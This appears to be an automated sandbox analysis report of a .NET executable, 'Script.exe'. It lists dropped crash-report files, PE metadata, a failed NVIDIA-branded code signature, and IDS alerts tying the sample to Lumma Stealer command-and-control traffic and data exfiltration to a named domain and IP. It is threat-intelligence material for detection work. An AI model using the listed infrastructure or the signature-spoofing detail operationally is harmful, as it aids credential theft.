Preview:	MDMP..a..... .........zg............$...............8.......$...........4....2..........`.......8...........T............$...S......................................................................................................eJ..............GenuineIntel............T.............zg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER69F.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8364
Entropy (8bit):	3.6922247087267817
Encrypted:	false
SSDEEP:	192:R6l7wVeJNH6P6YEIUSU94tFgmfnVJpiXprT89bpWsfmjm:R6lXJN6P6YE7SU9GFgmfnVJdp1fz
MD5:	9C014235E4DF697D913C15AC956E6355
SHA1:	E9AFC54B92276D08CD15EBC046465EC8B4E5C548
SHA-256:	4ABC43CB17CE52E33FEBE91F994C25307C814C7EE84C40496E87B40DFD45148D
SHA-512:	73C97D4EEF2394737D9150564BE44D77F012DF71BA90A31F90A3E78FB964B9CCC2A63E180BDE722BE1D0FEB390450612A1CEA414368011E74A90023C05365C83
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DF.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4730
Entropy (8bit):	4.43993718409598
Encrypted:	false
SSDEEP:	48:cvIwWl8zsxJg77aI9D0VWpW8VYuYm8M4JqaR0dxPcf6FKY+q8vpR0dxPcf9HQ5q5:uIjfDI7Rx7VqJxRlfxYKpRlf9HQ5q40d
MD5:	B9B26EAE283901CF726EA4E84892FFE8
SHA1:	A8F5643C8A1697417F3789C3D7E5C6D3023856DF
SHA-256:	47ADCB671178D25FE4FFCC408B485206553A25A71F2CDCE3A9C6F6856A756450
SHA-512:	9CC1EC4157B4D58C9FA875B6A91E6981CFE39B95224FA537C3C2B264F057DBF98D099C43C5144CE27BACDA5330205DC8D989893A6E8DE50A86009214D198E933
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="662951" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421679422525117
Encrypted:	false
SSDEEP:	6144:ySvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNU0uhiTwg:BvloTMW+EZMM6DFyO03wg
MD5:	5650337429A2ADE2AD6AA01605226973
SHA1:	C55CE1A0D6F304EBC7BCC4A8F185B7F26FC69B25
SHA-256:	0E477680C446DD9B1083B3427F9685406AC5BED574CDD069662792DF5771A6DF
SHA-512:	C03C5C4B4AD69F9DEA85D1E2A2B9892A0B33BC1C745E010508D206B658B42FE60701B3F5CFB2325BEE587C5BBE664996E30FC61ED209CD04CBC4D3175A987418
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~..._..............................................................................................................................................................................................................................................................................................................................................D ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.894515349563136
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Script.exe
File size:	383'016 bytes
MD5:	9692fcb7996881ff1489818817d4b300
SHA1:	17c9a0067ad325da87a096e62715848b8fc4ea34
SHA256:	7931b9a8460e753cf1f42b6dc5dd0b32e40a17d19dd94b2fcbba55817a9a77b6
SHA512:	541ad18f7ad479017167cbcb193e0e96cf3de502021c36bb9f001d2b2fc55efc32d1457d2ebdb6ef3336c902e6e2dd406f2747b319c0ea5f6777d965f6318762
SSDEEP:	6144:p2pwktDrDuMtVXo6MFbdQChRNraGhIlWW1n88gupG3XZ6AZP5dw7rGViJdh4lQ9u:d4CmYP1SC7Np61uXHzPPVU9FmJ1CXEEO
TLSH:	7184029E3EC44702C59954B290E3092A1BF1D7A3A672F55539C104EE0FC2FE4AE56EDC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...AL................0.................. ........@.. ....................... ............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x40dade
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB98C4C41 [Thu Aug 23 20:32:01 2068 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 01:00:00 17/01/2026 00:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xda90	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe000	0x598	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x5b200	0x2628	.BSS
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xda41	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbae4	0xbc00	19f0b50531f98a20a9a65d39c849687c	False	0.5685048204787234	data	6.109180699584785	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xe000	0x598	0x600	0952258526daaa3e0a687f3a06f53a5d	False	0.4114583333333333	data	4.03365806651715	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10000	0xc	0x200	8213ad787590c8df00be095c16f90f29	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.BSS	0x12000	0x4ea00	0x4ea00	e0fd756edb5ed6d42e1e30cfbef61b96	False	1.000329143481717	data	7.99929094545903	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xe0a0	0x30c	data			0.41923076923076924
RT_MANIFEST	0xe3ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-05T19:08:56.657541+0100	2058656	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)	1	192.168.2.5	50187	1.1.1.1	53	UDP
2025-01-05T19:08:57.145055+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49715	104.21.80.1	443	TCP
2025-01-05T19:08:57.145055+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49715	104.21.80.1	443	TCP
2025-01-05T19:08:57.696243+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49715	104.21.80.1	443	TCP
2025-01-05T19:08:57.696243+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49715	104.21.80.1	443	TCP
2025-01-05T19:08:58.185544+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49717	104.21.80.1	443	TCP
2025-01-05T19:08:58.185544+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49717	104.21.80.1	443	TCP
2025-01-05T19:08:58.670578+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49717	104.21.80.1	443	TCP
2025-01-05T19:08:58.670578+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49717	104.21.80.1	443	TCP
2025-01-05T19:08:59.312799+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49719	104.21.80.1	443	TCP
2025-01-05T19:08:59.312799+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49719	104.21.80.1	443	TCP
2025-01-05T19:09:00.376766+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49720	104.21.80.1	443	TCP
2025-01-05T19:09:00.376766+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49720	104.21.80.1	443	TCP
2025-01-05T19:09:01.440099+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49721	104.21.80.1	443	TCP
2025-01-05T19:09:01.440099+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49721	104.21.80.1	443	TCP
2025-01-05T19:09:03.629493+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49722	104.21.80.1	443	TCP
2025-01-05T19:09:03.629493+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49722	104.21.80.1	443	TCP
2025-01-05T19:09:04.109019+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49722	104.21.80.1	443	TCP
2025-01-05T19:09:05.014898+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49723	104.21.80.1	443	TCP
2025-01-05T19:09:05.014898+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49723	104.21.80.1	443	TCP
2025-01-05T19:09:07.124495+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49724	104.21.80.1	443	TCP
2025-01-05T19:09:07.124495+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49724	104.21.80.1	443	TCP
2025-01-05T19:09:07.853831+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49724	104.21.80.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 19:08:56.679506063 CET	49715	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:56.679544926 CET	443	49715	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:56.679615974 CET	49715	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:56.682746887 CET	49715	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:56.682761908 CET	443	49715	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:57.144984007 CET	443	49715	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:57.145055056 CET	49715	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:57.156707048 CET	49715	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:57.156721115 CET	443	49715	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:57.156949997 CET	443	49715	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:57.198916912 CET	49715	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:57.253896952 CET	49715	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:57.253917933 CET	49715	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:57.254004955 CET	443	49715	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:57.696264982 CET	443	49715	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:57.696369886 CET	443	49715	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:57.696454048 CET	49715	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:57.697890997 CET	49715	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:57.697901964 CET	443	49715	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:57.697923899 CET	49715	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:57.697927952 CET	443	49715	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:57.706748962 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:57.706789017 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:57.706877947 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:57.707153082 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:57.707165956 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.185446024 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.185544014 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.235677004 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.235722065 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.236016035 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.238058090 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.238079071 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.238123894 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.670618057 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.670665026 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.670708895 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.670720100 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.670730114 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.670770884 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.670788050 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.670820951 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.670864105 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.670872927 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.670876026 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.670883894 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.670914888 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.670921087 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.670960903 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.670965910 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.675326109 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.675369978 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.675376892 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.732860088 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.761492968 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.761557102 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.761610031 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.761620045 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.761655092 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.761698008 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.768655062 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.768670082 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.768682003 CET	49717	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.768687963 CET	443	49717	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.835848093 CET	49719	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.835905075 CET	443	49719	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:58.836005926 CET	49719	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.836323023 CET	49719	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:58.836338043 CET	443	49719	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:59.312721968 CET	443	49719	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:59.312798977 CET	49719	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:59.314435005 CET	49719	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:59.314444065 CET	443	49719	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:59.314683914 CET	443	49719	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:59.316087961 CET	49719	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:59.316247940 CET	49719	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:59.316276073 CET	443	49719	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:59.882888079 CET	443	49719	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:59.882987976 CET	443	49719	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:59.883037090 CET	49719	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:59.883177042 CET	49719	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:59.883198023 CET	443	49719	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:59.909802914 CET	49720	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:59.909837008 CET	443	49720	104.21.80.1	192.168.2.5
Jan 5, 2025 19:08:59.909965992 CET	49720	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:59.910340071 CET	49720	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:08:59.910351992 CET	443	49720	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:00.376564980 CET	443	49720	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:00.376765966 CET	49720	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:00.378204107 CET	49720	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:00.378212929 CET	443	49720	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:00.378447056 CET	443	49720	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:00.379745960 CET	49720	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:00.379898071 CET	49720	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:00.379928112 CET	443	49720	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:00.379980087 CET	49720	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:00.423345089 CET	443	49720	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:00.891036987 CET	443	49720	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:00.891149044 CET	443	49720	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:00.891220093 CET	49720	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:00.898241043 CET	49720	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:00.898267984 CET	443	49720	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:00.983550072 CET	49721	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:00.983580112 CET	443	49721	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:00.983695984 CET	49721	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:00.984596014 CET	49721	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:00.984611034 CET	443	49721	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:01.439975977 CET	443	49721	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:01.440099001 CET	49721	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:01.448596001 CET	49721	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:01.448606968 CET	443	49721	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:01.448950052 CET	443	49721	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:01.450164080 CET	49721	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:01.450325966 CET	49721	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:01.450362921 CET	443	49721	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:01.450442076 CET	49721	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:01.450450897 CET	443	49721	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:03.073636055 CET	443	49721	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:03.073756933 CET	443	49721	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:03.073827028 CET	49721	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:03.074083090 CET	49721	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:03.074090004 CET	443	49721	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:03.163247108 CET	49722	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:03.163294077 CET	443	49722	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:03.163367987 CET	49722	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:03.163767099 CET	49722	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:03.163783073 CET	443	49722	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:03.629225016 CET	443	49722	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:03.629492998 CET	49722	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:03.634073973 CET	49722	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:03.634089947 CET	443	49722	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:03.634331942 CET	443	49722	104.21.80.1	192.168.2.5
